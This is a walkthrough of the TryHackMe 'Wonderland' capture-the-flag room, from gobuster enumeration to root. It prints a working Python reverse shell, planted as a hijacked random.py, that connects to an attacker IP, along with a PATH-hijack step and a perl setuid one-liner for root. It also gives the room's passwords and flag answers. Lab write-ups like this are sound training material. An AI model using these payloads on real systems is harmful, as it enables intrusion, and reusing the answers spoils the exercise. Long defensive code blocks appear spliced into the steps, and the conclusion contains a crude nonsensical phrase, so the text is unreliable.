Tryhackme - Wonderland

In this walkthrough, we will be going through the Wonderland room from Tryhackme. This room is rated Medium on the platform, and the objective is to grab two flags from the machine by showcasing skills in enumeration, exploitation, and horizontal and vertical privilege escalation. So, let’s get started without any delay.

Wonderland

Machine Info:

Title        Wonderland
IP address   10.10.15.200
Difficulty   Medium
Objective    Enter Wonderland and capture the flags.

Enumeration:

  • Checking whether the machine is live.

Pinging the machine

  • I performed an Nmap scan and found ports 22 and 80 open.

sudo nmap -sS -sV 10.10.15.200

nmap scan

  • Next, I started enumerating port 80, which was running a Golang web server.

Home Page

  • Fired up gobuster to reveal hidden directories and found one: /r

wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.15.200/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/17 20:15:31 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 0] [--> img/]
/index.html           (Status: 301) [Size: 0] [--> ./]  
/r                    (Status: 301) [Size: 0] [--> r

  • Navigating to /r, we got the message “Keep Going”. I ran gobuster again against this new URL.

bruteforcing directory

wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/r/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.15.200/r/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/17 20:17:56 Starting gobuster in directory enumeration mode
===============================================================
/a                    (Status: 301) [Size: 0] [--> a/]
/index.html           (Status: 301) [Size: 0] [--> ./]
                                                      
===============================================================
2023/03/17 20:19:40 Finished
===============================================================

bruteforcing directory

wh1terose@fsociety:~$ gobuster dir -u http://10.10.15.200/r/a/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.15.200/r/a/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/17 20:19:49 Starting gobuster in directory enumeration mode
===============================================================
/b                    (Status: 301) [Size: 0] [--> b/]
/index.html           (Status: 301) [Size: 0] [--> ./]
                                                      
===============================================================
2023/03/17 20:21:29 Finished
===============================================================

bruteforcing directory

  • It seems we are spelling out the word “rabbit”, one directory level at a time.

bruteforcing directory

bruteforcing directory

the rabbit directory

  • Checking the page source (Ctrl+U) revealed a potential username/password combination – alice:HowDothTheLittleCrocodileImproveHisShiningTail

alice password

Initial Access:

  • Used the credentials to log into the machine over SSH.

ssh login

  • Everything is upside down: the user flag is in the root directory.

user flag

  • Next we checked which commands we can run with elevated privileges using sudo -l. Nothing can be run as root, but we found that walrus_and_the_carpenter.py can be run as the user rabbit.

sudo -l

  • Upon checking the contents of walrus_and_the_carpenter.py, we found that it imports the random module.

random module

Privilege Escalation:

  • I came across Python module path hijacking: the interpreter puts the script’s own directory first on sys.path, so if we have write permission there we can shadow any module the script imports. Since the script lives in alice’s home directory, we create a file named random.py there; it gets imported instead of the standard library module, runs our code and gives us a shell as the user the script runs as.

import os
import pty
import socket

lhost = "10.18.11.103"
lport = 4444

ZIP_DEFLATED = 0

class ZipFile:
    def close(*args):
        return

    def write(*args):
        return

    def __init__(self, *args):
        return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()

python script

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
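As an added defensive check (my own example, not code from the room or this walkthrough), the Python below audits a sudo-runnable script for the module-shadowing condition used above: it lists the script’s imports, reports any that a file in the script’s directory already shadows or could shadow if the invoking user can write there, and shows the `-I` isolated-mode invocation that keeps the script directory off sys.path. The directory listing and writability flag are constructed inputs; `dir_writable_by` is a hypothetical helper that checks classic mode bits only (no ACLs).

```python
import os
import re
import stat

# Top-level module names a script imports (first dotted component only).
IMPORT_RE = re.compile(r"^\s*(?:import|from)\s+([A-Za-z_]\w*)", re.M)

def imported_modules(source):
    """Sorted, de-duplicated names of modules the script source imports."""
    return sorted(set(IMPORT_RE.findall(source)))

def audit_script(source, script_dir_entries, script_dir_writable):
    """Report imports that a file beside the script shadows or could shadow.

    Python puts the script's own directory at sys.path[0], so every import
    can be satisfied by <name>.py or a <name>/ package placed next to it.
    The caller supplies the directory listing and whether the invoking
    (sudo) user can write there; both are constructed inputs in the test.
    """
    findings = []
    for name in imported_modules(source):
        shadow = [e for e in script_dir_entries if e in (name + ".py", name)]
        if shadow:
            findings.append(("hijacked", name, shadow[0]))
        elif script_dir_writable:
            findings.append(("hijackable", name, None))
    return findings

def dir_writable_by(path, uid, gids):
    """Hypothetical helper: can user (uid, gids) write to path per mode bits?"""
    st = os.stat(path)
    if uid == 0:
        return True
    if st.st_uid == uid and (st.st_mode & stat.S_IWUSR):
        return True
    if st.st_gid in gids and (st.st_mode & stat.S_IWGRP):
        return True
    return bool(st.st_mode & stat.S_IWOTH)

def hardened_invocation(interpreter, script):
    """Command line a sudoers rule should pin: -I (isolated mode) keeps the
    script directory and user site-packages off sys.path and ignores
    PYTHONPATH, so a random.py next to the script is never imported."""
    return [interpreter, "-I", script]
```

The sudoers entry must list the exact arguments (including `-I`) for the hardened invocation to be the only one allowed.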

walrus_and_the_carpenter.py

netcat listener

teaParty

Segmentation fault teaParty

  • Viewing the contents of teaParty, we found a string showing that the binary calls date by bare name rather than by absolute path, so the command is looked up through PATH; this is what we can exploit with PATH manipulation.

date binary

  • I tried to create a file named “date” that spawns a shell, but I was unable to do so with either nano or vim. So I made the file on my local machine and transferred it using wget.

chmod +x date
echo $PATH
export PATH=/home/rabbit:$PATH
echo $PATH
./teaParty
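Added defensive counterpart to the teaParty issue (example code of my own, not from the room or the walkthrough): a SUID helper that shells out must pin an absolute path and set its own trusted PATH, and an auditor can catch the bare-name pattern. The functions below flag PATH entries a privileged program must not trust, flag bare command names in `strings`-style output, and build a clean environment for a privileged child. `writable` is a caller-supplied callback, and the sample lines in the test are constructed, not teaParty’s actual strings.

```python
import shlex

# PATH a privileged program should set for itself rather than inherit.
TRUSTED_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Commands often shelled out to; in SUID code only absolute paths are safe.
COMMON_COMMANDS = {"date", "id", "ls", "cat", "sh", "bash", "whoami", "echo", "sleep"}

def unsafe_path_entries(path_value, writable):
    """Entries of a PATH a SUID program must not trust: empty or relative
    entries (they resolve against the caller's cwd) and directories the
    calling user can write to. `writable(dir)` is a caller-supplied check."""
    bad = []
    for entry in path_value.split(":"):
        if entry == "" or not entry.startswith("/"):
            bad.append((entry, "relative"))
        elif writable(entry):
            bad.append((entry, "writable"))
    return bad

def relative_commands(strings_output):
    """Flag strings from a binary that look like a shell command invoked by
    bare name (resolved through PATH) rather than by absolute path."""
    hits = []
    for line in strings_output.splitlines():
        try:
            words = shlex.split(line)
        except ValueError:  # unbalanced quotes: not a command line
            continue
        if words and words[0] in COMMON_COMMANDS:
            hits.append(line.strip())
    return hits

def privileged_env(env):
    """Environment for a privileged child: fixed PATH, no loader overrides
    (LD_PRELOAD, LD_LIBRARY_PATH, ...), everything else passed through."""
    clean = {k: v for k, v in env.items() if not k.startswith("LD_")}
    clean["PATH"] = TRUSTED_PATH
    return clean
```

Running `relative_commands` over the output of `strings` on each SUID binary found by `find / -perm -4000` is a quick way to spot this class of bug during a build review.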

./teaParty

  • Next we found a password.txt file in the hatter user’s home directory, and it contained a password. I downloaded linpeas onto the machine to enumerate privilege escalation vectors, but it got stuck in the date section. So I tried the new password to SSH in as hatter, and it worked. Meanwhile I re-spawned the rabbit shell and deleted the date file we made earlier to avoid the conflict while running linpeas.

password.txt

teaParty

  • hatter SSH password – WhyIsARavenLikeAWritingDesk?

SSH hatter login

  • In the linpeas results, we find that the perl binary has a capability set. We can use it as a backdoor to escalate our privileges by changing the process UID to 0.

linpeas output

Capabilities GTFObins

cp $(which perl) .
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
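Added detection example (my own code, not the walkthrough’s or linpeas’): it parses `getcap -r /` output in both the older `path = caps+flags` and the newer `path caps=flags` formats, and flags files that carry identity- or permission-bypassing capabilities or that are interpreters, which hand any capability to whatever script they run. The sample output in the test is constructed and mirrors the perl finding above.

```python
import re

# Capabilities that let a process change identity or bypass file permissions.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
}
# Interpreters: a capability here is inherited by any script they execute.
INTERPRETERS = {"perl", "python", "ruby", "node", "php", "lua", "gdb", "vim"}

# Matches both "/usr/bin/perl = cap_setuid+ep" and "/usr/bin/perl cap_setuid=ep".
LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>\S+)$")

def parse_getcap(line):
    """Return (path, {capability names}, flags) for one getcap line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    field = m.group("caps")
    sep = "=" if "=" in field else "+"      # newer libcap prints '=', older '+'
    names, _, flags = field.partition(sep)
    return m.group("path"), set(names.split(",")), flags

def dangerous_findings(getcap_output):
    """Files whose capabilities matter for privilege escalation, with reasons."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        reasons = []
        risky = caps & DANGEROUS_CAPS
        if risky:
            reasons.append("dangerous:" + ",".join(sorted(risky)))
        # Strip version suffixes such as perl5.30.0 or python3.6.
        base = path.rsplit("/", 1)[-1].rstrip("0123456789.")
        if base in INTERPRETERS and "e" in flags:   # effective: usable at once
            reasons.append("interpreter")
        if reasons:
            findings.append((path, reasons))
    return findings
```

Remediation for a finding like the perl one is `setcap -r /usr/bin/perl`, after confirming nothing legitimate depends on it.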

  • With this, we successfully rooted this box and got our root flag as a sign of victory.

root flag

Task 1 – Capture the flags

Question 1 – Obtain the flag in user.txt

thm{"Curiouser and curiouser!"}

Question 2 – Escalate your privileges, what is the flag in root.txt?

thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}

Conclusion:

So that was “Wonderland” for you. We started off with a regular nmap scan and found two open ports – 80 (HTTP) and 22 (SSH). Next, we performed directory bruteforcing with gobuster and found the directory pattern r/a/b/b/i/t. Moving on, we found alice’s credentials in the page source and got our initial access via SSH. Once inside, we got the user flag in the root directory. In alice’s home directory we found a Python script that imports the random module, and used module path hijacking to get a shell as the user rabbit. Then we performed PATH manipulation on the date binary to get access as the user hatter. We found hatter’s SSH password in his home directory and used it to log into his account. At last, we used linpeas to find potential privilege escalation vectors and found that perl had a capability set. With the help of that, we escalated our privileges to root and got the root flag in the root directory, alongside the tampon of Lord Putin. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.
